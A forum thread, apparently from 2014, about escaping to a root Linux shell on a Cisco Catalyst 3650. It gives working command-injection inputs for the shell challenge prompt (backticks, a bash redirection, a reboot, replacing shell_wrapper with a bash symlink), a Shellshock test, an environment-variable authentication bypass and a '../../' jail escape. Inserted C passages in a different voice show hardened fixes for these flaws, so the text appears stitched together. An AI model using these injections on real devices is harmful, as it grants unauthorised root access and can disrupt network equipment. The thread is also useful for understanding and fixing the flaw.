[HELP] Catalyst-3650#request system shell

kamikatze (Member, join:2007-11-02):

Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
 

I remember being able to get through to the shell by entering something trivial like '/bin/sh' instead. I am sure it wasn't a dream, but I clearly remember I didn't write it down because I'm foolish like that..

So how do i drop into bash from IOS-XE on a Cisco Catalyst 3650?

Switch Ports Model              SW Version        SW Image              Mode
------ ----- -----              ----------        ----------            ----
*    1 28    WS-C3650-24PS      03.03.03SE        cat3k_caa-universalk9 INSTALL
 
kamikatze (Member):

Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 438e1fd36da9cfdb61e655353a48bb9cf69f274ab2d2[..]
Please enter the shell access response based on the above challenge 
(Press "Enter" when done or to quit.):
`/bin/sh`
sh-3.2# uname -a
sh-3.2#
sh-3.2# uname -2323
uname: invalid option -- '2'
Try `uname --help' for more information.
 
           AHA SO WE HAVE STDERR, but not STDOUT..
 
sh-3.2# ls
sh-3.2# pwd
sh-3.2# whoami
sh-3.2# exit
exit
Key verification failed
 

Alright then, let's go again. More: code execution before key verification. Nice.
Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: b577ea00feb8c833d725a85c6c53e1839ab9[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
bash-3.2# uname -a
Linux localhost 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
bash-3.2# ls
BinOS       config     hugepages  lic0        rommon_to_env  sys     webui
RP_0_0_cli  crashinfo  include    lic1        root           tftp
auto        dev        install    lkern_init  sbin           tmp
bin         drec0      isan       misc        selinux        ucode0
bsn         epc        issu       mnt         share          usr
chasfs      etc        lib        obfl0       space          var
common      flash      lib32      proc        spi            vol
bash-3.2# whoami
root
bash-3.2# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
binos:x:85:85:binos administrative user:/usr/binos/conf:/usr/binos/conf/bshell.sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[..]
 

Cisco, please don't fix this or I will never ever upgrade this image.

A silly one:
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: <program name> SecureShell <Hash> <Signature> [debug]Key verification failed
Switch#
 
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
 
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
 
 

Uh.. netcat is there. I'm starting to have second thoughts about whether posting this in open waters is a good idea..

bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
 

Bigzizzzle (Premium Member, join:2005-01-27, Beverly Hills, CA) to kamikatze:
I'm confused here.

Are you saying you went up Cisco's skirt and grabbed a fist full of balls?

Hidden packages?

Akin to being in the JunOS shell (outside the CLI).

kamikatze (Member):

Yes indeed. But you can do this without fuss on the ASR1k; I'm not sure what's with all the "security" here on this little Cat 3k.
aryoba (MVM, join:2002-08-22) to kamikatze:
said by kamikatze:

[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]

What did you do to fix the "Key verification failed" error situation?

kamikatze (Member):

This:
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
 

I guess Cisco isn't big on input validation, as ` isn't escaped, so I'm still inside the key verification function.
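What kamikatze is describing here, and what lanaaaaaa later spells out (shell_wrapper handing the challenge response to system()), is the textbook command-injection pattern: user input is spliced into a string that a shell then parses. As an added example, not Cisco's shell_wrapper code, the unsafe construction is shown beside a hardened replacement that validates the response and invokes the verifier through execve with an argv array, so backticks and other metacharacters are never interpreted. The verifier path, its argument layout and the hex-only response format are assumptions for the sake of the example.

```c
/* Added example, not Cisco's code: the unsafe system() pattern beside a
 * hardened version.  Assumed (hypothetical): the verifier lives at VERIFIER,
 * takes "SecureShell <challenge> <response>", and a valid response is a hex
 * string (a signature over the challenge). */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define VERIFIER "/usr/binos/bin/code_sign_verify_nova_pkg" /* assumed path */
#define MAX_FIELD 512

/* UNSAFE: builds the command line exactly as a system() caller would.  Shown
 * only to make the bug visible; it is never handed to system() here.  Any
 * shell metacharacter in `response` becomes part of the command. */
int unsafe_command_line(char *out, size_t outsz,
                        const char *challenge, const char *response) {
    int n = snprintf(out, outsz, "%s SecureShell %s %s",
                     VERIFIER, challenge, response);
    return (n > 0 && (size_t)n < outsz) ? 0 : -1;
}

/* Hardened step 1: reject anything that is not a plausible response before
 * any process is spawned.  Returns 1 for a non-empty, bounded hex string. */
int field_is_hex(const char *s, size_t max) {
    size_t n = 0;
    while (s[n] != '\0') {
        if (n + 1 >= max) return 0;               /* too long */
        if (!isxdigit((unsigned char)s[n])) return 0;
        n++;
    }
    return n > 0;
}

/* Hardened step 2: run the verifier via execve with an argv array and a
 * minimal environment.  No shell parses the arguments, so metacharacters are
 * just bytes.  Returns the verifier's exit status, 127 if it could not be
 * executed, or -1 on malformed input or fork/wait failure. */
int run_verifier(const char *verifier, const char *challenge,
                 const char *response) {
    if (!field_is_hex(challenge, MAX_FIELD) || !field_is_hex(response, MAX_FIELD))
        return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)verifier, "SecureShell",
                               (char *)challenge, (char *)response, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve(verifier, argv, envp);
        _exit(127);                               /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char cmd[1024];
    /* constructed input: the backtick payload from the thread */
    unsafe_command_line(cmd, sizeof cmd, "94d5c0", "`/bin/sh`");
    printf("system() would have parsed: %s\n", cmd);
    printf("hardened path returns: %d (rejected before exec)\n",
           run_verifier("/nonexistent/verifier", "94d5c0", "`/bin/sh`"));
    return 0;
}
```

The two steps are independent defences: the hex check stops malformed input at the door, and execve without a shell means that even a validation gap cannot turn into command execution. A shell-wrapper that also honours an environment variable such as DISABLE_SHELL_AUTHENTICATION, as lanaaaaaa notes, has a third bypass that no amount of argument handling fixes; that switch has to go.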
meta (Member, join:2004-12-27):

Look at their CallManager vulnerabilities; most Linux-based platforms they produce are usually Swiss cheese with regard to security.
HELLFIRE (MVM, join:2009-11-25) to kamikatze:
...watching this with some interest... just from a "wow, I did not know that" perspective.

Regards
markysharkey (Premium Member, join:2012-12-20):

said by HELLFIRE:

...watching this with some interest... just from a "wow, I did not know that" perspective.

+ 1

kamikatze (Member) to HELLFIRE:
Sneak preview:

[EXTRA]    Building a toolchain for:                  
[EXTRA]      build  = x86_64-unknown-linux-gnu 
[EXTRA]      host   = x86_64-unknown-linux-gnu 
[EXTRA]      target = mips-unknown-elf            
 

bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped
 

Stay tuned. Returning next week. Holidays.

----
In other news.
Please enter the shell access response based on the above 
challenge (Press "Enter" when done or to quit.):
`sh 1>&2`
sh-3.2# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
 
But of course, this goes without saying.
kamikatze (Member) to HELLFIRE:
Holy crap, I did it :)

First I got rid of the annoying RSA challenge altogether.
Switch#req sys shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: a99bac81d1ea605579e81d1d5[..]
Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.):
`bash -c "mv /usr/binos/bin/shell_wrapper /tmp/ohboy; ln -s /bin/bash /usr/binos/bin/shell_wrapper; exit"`
SecureShell: <program name> SecureShell <Hash> <Signature> [debug]Key verification failed
 
Switch#req sys shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
[Switch:/]$ whoami ; uname -a
root
Linux Switch 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
 

And then..

youtu.be/-qbmKYQ2jCA


mirror:

vimeo.com/111153099


Full cross compile story here:
stackoverflow.com/questi ··· 26789949
HELLFIRE (MVM) to kamikatze:
Anything programming or *nix makes my brain break... but I'm still watching with interest. Enjoy the vacation, kamikatze, and keep us posted!

Regards

lanaaaaaa (Anon) to kamikatze:
I wish you hadn't gone public with this, so the rest of us could have enjoyed our extra debugging toolset. It's quite easy to fix this so that the Linux shell stops working.

So when you request the shell, the following happens:

a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response') (the same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads, via libcodesign_pd.so+libflash.so, 2k from /dev/mtdblock6, signs the challenge, compares it to the response and returns 0 if it is valid, otherwise
c) so anything like ||/bin/true will work just fine

shell_wrapper ignores verification if DISABLE_SHELL_AUTHENTICATION=1 is in the environment

The mtdblock6 RSA public key can be changed, so you can generate a valid response by having its secret companion

You can escape the IOS filesystem jail (/mnt/sd3/user) with ../../, so copy foo ../../etc would copy foo to /etc
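The jail escape in the last point is a path-normalisation bug: a user-supplied relative path is joined onto the jail root without resolving ".." components first, so the result can land outside the root. As an added example, not Cisco's code, here is the check a file-system front end would apply before touching the path: normalise the joined path lexically, then accept it only if it still starts with the jail root. The jail root /mnt/sd3/user is taken from the post; the function names are hypothetical, and leading slashes in the user path are treated as relative to the jail.

```c
/* Added example, not Cisco's code: confining a user-supplied relative path
 * to a jail root.  The root /mnt/sd3/user comes from the thread; the
 * functions are hypothetical. */
#include <stdio.h>
#include <string.h>

/* Lexically normalise an absolute path into out: collapses "//" and ".",
 * resolves ".." (never above "/"), strips a trailing slash.  Returns 0, or
 * -1 if in is not absolute or out is too small. */
int normalize_path(const char *in, char *out, size_t outsz) {
    if (in[0] != '/' || outsz < 2) return -1;
    size_t o = 0;
    out[o++] = '/';
    const char *p = in;
    while (*p) {
        while (*p == '/') p++;                   /* skip separators */
        if (!*p) break;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - seg);
        if (len == 1 && seg[0] == '.') continue; /* "." adds nothing */
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (o > 1) {                         /* pop previous segment */
                o--;                             /* drop its trailing '/' */
                while (o > 0 && out[o - 1] != '/') o--;
            }
            continue;                            /* ".." at "/" stays "/" */
        }
        if (o + len + 1 >= outsz) return -1;
        memcpy(out + o, seg, len);
        o += len;
        out[o++] = '/';
    }
    if (o > 1) o--;                              /* strip trailing '/' */
    out[o] = '\0';
    return 0;
}

/* Returns 1 if user_path, joined onto jail_root, still lies inside the root
 * after normalisation; 0 if it escapes or is malformed. */
int path_within_jail(const char *jail_root, const char *user_path) {
    char root_norm[1024], joined[1024], norm[1024];
    if (normalize_path(jail_root, root_norm, sizeof root_norm) != 0) return 0;
    int n = snprintf(joined, sizeof joined, "%s/%s", root_norm, user_path);
    if (n < 0 || (size_t)n >= sizeof joined) return 0;
    if (normalize_path(joined, norm, sizeof norm) != 0) return 0;
    size_t rl = strlen(root_norm);
    if (rl == 1) return 1;                       /* root "/" contains everything */
    if (strncmp(norm, root_norm, rl) != 0) return 0;
    /* the next byte must end the path or start a subdirectory, so that
     * "/mnt/sd3/user2" is not mistaken for something under "/mnt/sd3/user" */
    return norm[rl] == '\0' || norm[rl] == '/';
}

int main(void) {
    /* constructed inputs: a benign copy target and the escape from the thread */
    const char *paths[] = { "foo", "sub/../foo", "../../etc", "../user2/x" };
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++)
        printf("%-12s -> %s\n", paths[i],
               path_within_jail("/mnt/sd3/user", paths[i]) ? "inside jail" : "REJECTED");
    return 0;
}
```

A lexical check like this is the minimum; on a real file system the front end should additionally resolve symlinks (realpath or openat with a directory descriptor) before the prefix comparison, since a link inside the jail can point outside it just as ".." does.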

kamikatze (Member):

web.nvd.nist.gov/view/vu ··· 014-7990

It happened.

Sure, some might call it 'extra debugging toolset'. But let me take the party pooper role and call it what it is, a blatant security hole.

Lanaaaaa (Anon):

I disagree that it is a security hole.

You have to have access to the device already to call the Linux CLI. I'd compare it to a 'jailbreak': you're getting access to the system you already paid for, access you should have had to begin with.

Some other IOS-XE platforms have not restricted the access. IOS-XR still openly allows access to the QNX shell. JunOS still allows access to the FreeBSD shell (albeit binaries have been signed for a few years now, which hurts legit use cases).